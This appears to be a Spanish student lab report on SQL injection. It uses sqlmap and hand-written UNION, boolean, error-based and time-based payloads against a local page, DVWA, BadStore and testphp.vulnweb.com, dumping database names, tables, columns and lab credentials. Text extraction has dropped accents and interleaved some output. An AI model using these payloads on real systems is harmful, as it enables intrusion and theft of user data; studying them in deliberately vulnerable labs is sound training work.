Professional Documents
Culture Documents
Injection 2
Map
ndice
1. A) Ataque Local..............................................................................................................3 Servidor de BD y Versin ..................................................................................3
B) Nombre de la BD......................................................................................................5 C) D) E) F) G) 2. Tablas: ........................................................................................................................6 Columnas: ................................................................................................................7 Contenido de la Tabla:............................................................................................8 Resto de Bases de Datos: .....................................................................................9 Usuarios de MySQL: ......................................................................................... 10 DVWA ....................................................................................................................... 12
B) Nombre de la BD.................................................................................................... 19 C) D) E) 4. A) Tablas........................................................................................................................ 20 Columnas ............................................................................................................... 21 Resto de BBDD ....................................................................................................... 22 Acunetix.................................................................................................................... 23 Servidor de BD y Versin ................................................................................ 23
Pgina 2
SQL Injection
1. Ataque Local
Vamos a realizar un ataque de SQL injection a nuestra pgina anterior con la cual hacamos una consulta a nuestra base de datos de MySQL. Su localizacin es: http://localhost/ejerPHP/SQL_Injection/consulta.php Para ello utilizaremos el programa SQLMap desde la consola.
A) Servidor de BD y Versin
Primero vamos a averiguar el tipo de servidor de Base de Datos y su versin, para ello utilizaremos la opcin b de sqlmap:
[13:57:28] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [13:57:28] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [13:57:38] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' in jectable [13:57:38] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [13:57:38] [INFO] target url appears to be UNION injectable with 3 columns [13:57:38] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 colu mns' injectable GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] Y sqlmap identified the following injection points with a total of 29 HTTP(s) requests: --Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 6656=6656 Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAS T(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,5 8)), NULL, NULL# Type: AND/OR time-based blind
En este paso el programa ha ido testeando cada una de las posibilidades para averiguar el tipo de servidor: []
'MySQL > 5.0.11 'PostgreSQL > 8.1 'Microsoft SQL Server
[]
Pgina 4
SQL Injection
B) Nombre de la BD
ste es el primer paso para sacar toda la informacin que podamos de nuestra vctima ya que a partir de aqu iremos pasa a paso entrando ms a fondo en la BD. Sacamos el nombre de la Base de Datos a la que se refiere la consulta que hemos realizado, es decir la base de datos actual, con el comando: --current-db
C) Tablas: Una vez obtenido el nombre de la Base de Datos, ya podemos proceder a ver las tablas que sta posee, mediante el comando --tables indicando D asir1 para el nombre que hemos obtenido antes:
Pgina 6
SQL Injection
D) Columnas:
Database: asir1 Table: usuarios [3 columns] +--------------+-------------------------+ | Column | Type | +--------------+-------------------------+ | id | int(10) unsigned | | nonmbre | varchar(50) | | password | varchar(50) | +----------+-----------------------------+
[14:06:31] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\ output\localhost' [*] shutting down at: 14:06:31
E) Contenido de la Tabla:
Database: asir1 Table: usuarios [3 entries] +----+---------+----------+ | id | nonmbre | password | +----+---------+----------+ | 2 | ivan | ivanasir | | 3 | luci | luciasir | | 1 | root | asir2012 | +----+---------+----------+ Ahora ya tenemos nuestra tabla usuarios de la Base de Datos asir1 completa
Ivn Martn Valderas Pgina 8
SQL Injection
available databases [8]: [*] asir1 [*] cdcol [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin [*] test [*] webauth
G) Usuarios de MySQL:
database management system users [4]: [*] ''@'localhost' [*] 'pma'@'localhost' [*] 'root'@'127.0.0.1' [*] 'root'@'localhost'
Pgina 10
SQL Injection
Slo existe un usuario root. Aqu est uno de los problemas. Estamos utilizando el usuario root que trae por defecto MySQL para acceder por PHP. Si estamos utilizando el usuario root para nuestras sentencias de SQL eso quiere decir que podemos hacer llamadas al sistema:
2. DVWA
Installation
Default username = admin Default password = password
Pgina 12
SQL Injection
1' or '1'='1' union select password, first_name from users where first_name='admin
ID: 1' or '1'='1' union select password, first_name from users where first_name='admin
First name: 5f4dcc3b5aa765d61d8327deb882cf99 Surname: admin
http://es.scribd.com/doc/48652427/Practica-SQL-Injection-en-DVWA
Pgina 14
SQL Injection
Hemos obtenido una contrasea, aunque como vemos est codificada, vamos a utilizar una utilidad web para decodificarla:
Probamos a sacar todas las contraseas a la vez, ya que con el anterior cdigo deberamos hacerlo 1 a 1:
1' or '1'='1' union select first_name, password from users where '1'='1
Pgina 16
SQL Injection
3. BadStore
Si en el campo search escribimos una comilla doble () nos encontramos con una respuesta del servidor SQL, por lo que podemos prever la vulneravilidad SQL
A) Servidor de BD y Versin
sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 10:02:41 [10:02:41] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file [10:02:41] [INFO] testing connection to the target url [10:02:41] [INFO] testing if the url is stable, wait a few seconds [10:02:42] [INFO] url is stable [10:02:42] [INFO] testing if GET parameter 'searchquery' is dynamic [10:02:43] [WARNING] GET parameter 'searchquery' is not dynamic [10:02:43] [INFO] heuristic test shows that GET parameter 'searchquery' might be injectable (possible DBMS: MySQL) [10:02:43] [INFO] testing sql injection on GET parameter 'searchquery' [10:02:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:02:44] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [10:02:45] [INFO] testing 'MySQL > 5.0.11 stacked queries' [10:02:45] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' parsed error message(s) showed that the back-end DBMS could be MySQL. Do you wan t to skip test payloads specific for other DBMSes? [Y/n] y [10:02:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [10:02:57] [INFO] target url appears to be UNION injectable with 4 columns [10:02:57] [INFO] GET parameter 'searchquery' is 'MySQL UNION query (NULL) - 1 t o 10 columns' injectable
GET parameter 'searchquery' is vulnerable. Do you want to keep testing the other s? [y/N] y Aqu nos ha avisado de que el parmetro searchquery es vulnerable, es decir, la caja de bsqueda donde antes insertamos las comillas dobles () posee un GET que nos permitir insertar ah sentencias SQL, nos pregunta adems si queremos buscar otros parmetros vulnerables.
[10:03:05] [INFO] testing if GET parameter 'action' is dynamic [10:03:05] [INFO] confirming that GET parameter 'action' is dynamic [10:03:05] [INFO] GET parameter 'action' is dynamic [10:03:05] [WARNING] heuristic test shows that GET parameter 'action' might not be injectable [10:03:05] [INFO] testing sql injection on GET parameter 'action' [10:03:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [10:03:06] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [10:03:07] [INFO] testing 'MySQL > 5.0.11 stacked queries' [10:03:07] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [10:03:08] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [10:03:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [10:03:17] [WARNING] GET parameter 'action' is not injectable [10:03:17] [INFO] testing if GET parameter 'x' is dynamic [10:03:17] [WARNING] GET parameter 'x' is not dynamic [10:03:17] [WARNING] heuristic test shows that GET parameter 'x' might not be in jectable [10:03:17] [INFO] testing sql injection on GET parameter 'x' [10:03:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [10:03:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [10:03:19] [INFO] testing 'MySQL > 5.0.11 stacked queries' [10:03:20] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [10:03:20] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [10:03:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [10:03:31] [WARNING] GET parameter 'x' is not injectable [10:03:31] [INFO] testing if GET parameter 'y' is dynamic [10:03:31] [WARNING] GET parameter 'y' is not dynamic [10:03:31] [WARNING] heuristic test shows that GET parameter 'y' might not be in jectable [10:03:31] [INFO] testing sql injection on GET parameter 'y' [10:03:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [10:03:32] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [10:03:33] [INFO] testing 'MySQL > 5.0.11 stacked queries' [10:03:33] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [10:03:34] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [10:03:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [10:03:44] [WARNING] GET parameter 'y' is not injectable sqlmap identified the following injection points with a total of 380 HTTP(s) req uests: --Place: GET Parameter: searchquery Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: searchquery=hi' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,1 18,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,5 8))# AND 'bYfh'='bYfh&action=search&x=0&y=0
Pgina 18
SQL Injection
--[10:03:45] [INFO] testing MySQL [10:03:45] [INFO] confirming MySQL [10:03:45] [INFO] the back-end DBMS is MySQL [10:03:45] [INFO] fetching banner web application technology: Apache 1.3.28
El nombre de la BD es badstoredb
C) Tablas
C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/badstore.cgi?se archquery=hi&action=search&x=0&y=0" --tables -D badstoredb
sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 10:20:13 [10:20:13] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file [10:20:13] [INFO] resuming injection data from session file [10:20:13] [INFO] resuming back-end DBMS 'mysql 4' from session file [10:20:13] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: searchquery Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: searchquery=hi' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,1 18,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,5 8))# AND 'bYfh'='bYfh&action=search&x=0&y=0 --[10:20:14] [INFO] the back-end DBMS is MySQL web application technology: Apache 1.3.28 back-end DBMS: MySQL 4 [10:20:14] [ERROR] information_schema not available, back-end DBMS is MySQL < 5. 0 do you want to use common table existance check? [Y/n/q] y [10:20:21] [INFO] checking table existence using items from 'C:\sqlmap-0.9\sqlma p\txt\common-tables.txt' [10:20:21] [INFO] adding words used on web page to the check list please enter number of threads? [Enter for 1 (current)] [10:20:28] [WARNING] running in a single-thread mode. This could take a while. [10:27:14] [INFO] retrieved: itemdb
Pgina 20
SQL Injection
Database: badstoredb Table: itemdb [2 columns] +--------+---------+ | Column | Type | +--------+---------+ | price | numeric | | qty | numeric | +--------+---------+
[10:34:18] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\ output\192.168.13.164'
E) Resto de BBDD
Como podemos haber visto, no hay ninguna tabla llamada usuarios ni nada por el estilo, slo se encuentra la tabla de los productos por lo que de esta manera no podemos sacar ni usuarios ni contraseas, vamos a comprobar entonces otras bases de datos:
Pgina 22
SQL Injection
4. Acunetix
Entramos en la web y si damos unas vueltas por ella , en el apartado categories vemos que la url nos aparece ?cat=1, es un indicio para comprobar. http://testphp.vulnweb.com/listproducts.php?cat=1
ble (possible DBMS: MySQL) [10:52:51] [INFO] testing sql injection on GET parameter 'cat' [10:52:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [10:52:52] [INFO] GET parameter 'cat' is 'AND boolean-based blind - WHERE or HAV ING clause' injectable [10:52:52] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [10:52:52] [INFO] GET parameter 'cat' is 'MySQL >= 5.0 AND error-based - WHERE o r HAVING clause' injectable [10:52:52] [INFO] testing 'MySQL > 5.0.11 stacked queries' [10:52:52] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [10:53:52] [INFO] GET parameter 'cat' is 'MySQL > 5.0.11 AND time-based blind' i njectable [10:53:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [10:53:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'cat' is vulnerable. Do you want to keep testing the others? [y/N] n
sqlmap identified the following injection points with a total of 29 HTTP(s) requ ests: --Place: GET Parameter: cat Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat=1 AND 4423=4423 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: cat=1 AND (SELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,10 7,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),F LOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: cat=1 AND SLEEP(5) --[10:54:07] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake )
web application technology: Apache 2.0.55, PHP 5.1.2 back-end DBMS: MySQL 5.0
[10:54:07] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\ output\testphp.vulnweb.com' [*] shutting down at: 10:54:07
Pgina 24
SQL Injection
B) Nombre de la BD
C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?ca t=1 --current-db
sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 11:52:15 [11:52:15] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com\session ' as session file [11:52:15] [INFO] resuming injection data from session file [11:52:15] [INFO] resuming back-end DBMS 'mysql 5.0' from session file [11:52:15] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: cat Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat=1 AND 4423=4423 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: cat=1 AND (SELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,10 7,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),F LOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: cat=1 AND SLEEP(5) --[11:52:16] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake ) web application technology: Apache 2.0.55, PHP 5.1.2 back-end DBMS: MySQL 5.0 [11:52:16] [INFO] fetching current database
C) Tablas
C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?ca t=1 --tables -D acuart
sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 11:54:12 [11:54:12] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com\session ' as session file [11:54:12] [INFO] resuming injection data from session file [11:54:12] [INFO] resuming back-end DBMS 'mysql 5.0' from session file [11:54:12] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: cat Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat=1 AND 4423=4423 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: cat=1 AND (SELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,10 7,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),F LOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: cat=1 AND SLEEP(5) --[11:54:14] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake ) web application technology: Apache 2.0.55, PHP 5.1.2 back-end DBMS: MySQL 5.0 [11:54:14] [INFO] fetching tables for database 'acuart' [11:54:14] [INFO] the SQL query used returns 7 entries [11:54:15] [INFO] retrieved: acuart [11:54:15] [INFO] retrieved: artists [11:54:15] [INFO] retrieved: acuart [11:54:15] [INFO] retrieved: carts [11:54:16] [INFO] retrieved: acuart [11:54:16] [INFO] retrieved: categ [11:54:16] [INFO] retrieved: acuart [11:54:16] [INFO] retrieved: featured [11:54:17] [INFO] retrieved: acuart [11:54:17] [INFO] retrieved: guestbook [11:54:17] [INFO] retrieved: acuart [11:54:17] [INFO] retrieved: pictures [11:54:18] [INFO] retrieved: acuart [11:54:18] [INFO] retrieved: users
Database: acuart [7 tables] +-----------+ | artists | | carts | | categ | | featured | | guestbook | | pictures | | users | +-----------+
Pgina 26
SQL Injection
D) Columnas
C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?ca t=1 --columns -T users -D acuart
sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 11:56:55 [11:56:55] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com\session ' as session file [11:56:55] [INFO] resuming injection data from session file [11:56:55] [INFO] resuming back-end DBMS 'mysql 5.0' from session file [11:56:55] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: cat Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat=1 AND 4423=4423 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: cat=1 AND (SELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,10 7,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),F LOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: cat=1 AND SLEEP(5) --[11:56:56] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake ) web application technology: Apache 2.0.55, PHP 5.1.2 back-end DBMS: MySQL 5.0 [11:56:56] [INFO] fetching columns for table 'users' on database 'acuart' [11:56:56] [INFO] the SQL query used returns 8 entries [11:56:56] [INFO] retrieved: uname [11:56:56] [INFO] retrieved: varchar(100) [11:56:57] [INFO] retrieved: pass [11:56:57] [INFO] retrieved: varchar(100) [11:56:57] [INFO] retrieved: cc Database: acuart [11:56:58] [INFO] retrieved: varchar(100) [11:56:58] [INFO] retrieved: address Table: users [11:56:58] [INFO] retrieved: mediumtext [8 columns] [11:56:58] [INFO] retrieved: email +---------+--------------+ [11:56:58] [INFO] retrieved: varchar(100) | Column | Type | [11:56:58] [INFO] retrieved: name [11:56:59] [INFO] retrieved: varchar(100) +---------+--------------+ [11:56:59] [INFO] retrieved: phone | address | mediumtext [11:56:59] [INFO] retrieved: varchar(100) | cart | varchar(100) | [11:56:59] [INFO] retrieved: cart | cc | varchar(100) | [11:56:59] [INFO] retrieved: varchar(100)
| email | varchar(100) | | name | varchar(100) | | pass | varchar(100) | | phone | varchar(100) | | uname | varchar(100) | +---------+--------------+